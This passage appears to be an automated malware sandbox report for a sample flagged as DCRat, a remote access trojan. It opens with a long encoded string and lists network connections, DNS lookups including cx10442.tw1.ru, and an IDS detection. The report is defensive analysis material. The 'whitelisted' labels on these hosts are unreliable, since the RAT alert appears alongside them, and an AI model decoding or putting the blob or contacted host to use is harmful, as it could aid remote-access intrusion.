MDM1kzYisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJZHZXllasdUYElzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaJpWT0QTeOVDMDxEeVpnT1NmeNl2bqlka5ckYpdXaJRlVslkNJNVZ5JlbiFTOykVa3lWSp9maJVXOXFmbW12YpdXaJl2bqlUNShVYqp0QMl2YE1Ue0kXT4lkaMBTSqxkMFpWTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI1cTNyIjYkJTY2IWNjBTZ1cjN2EGMyMWOxEzY2MDOwUGMkZWM4MWYlJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
4536
svchost.exe
52.167.17.97:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
52.167.17.97:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4712
MoUsoCoreWorker.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
2.23.227.215:443
www.bing.com
Ooredoo Q.S.C.
QA
whitelisted
1076
svchost.exe
2.23.242.9:443
go.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
1176
svchost.exe
20.190.159.2:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 52.167.17.97
  • 51.104.136.2
  • 4.231.128.59
whitelisted
google.com
  • 142.250.186.110
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 23.52.120.96
whitelisted
www.bing.com
  • 2.23.227.215
  • 2.23.227.208
whitelisted
go.microsoft.com
  • 2.23.242.9
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.2
  • 40.126.31.73
  • 20.190.159.64
  • 20.190.159.75
  • 40.126.31.69
  • 20.190.159.73
  • 20.190.159.0
  • 20.190.159.23
whitelisted
cx10442.tw1.ru
  • 94.198.223.74
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted

Threats

PID
Process
Class
Message
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
1 ETPRO signatures available at the full report
No debug info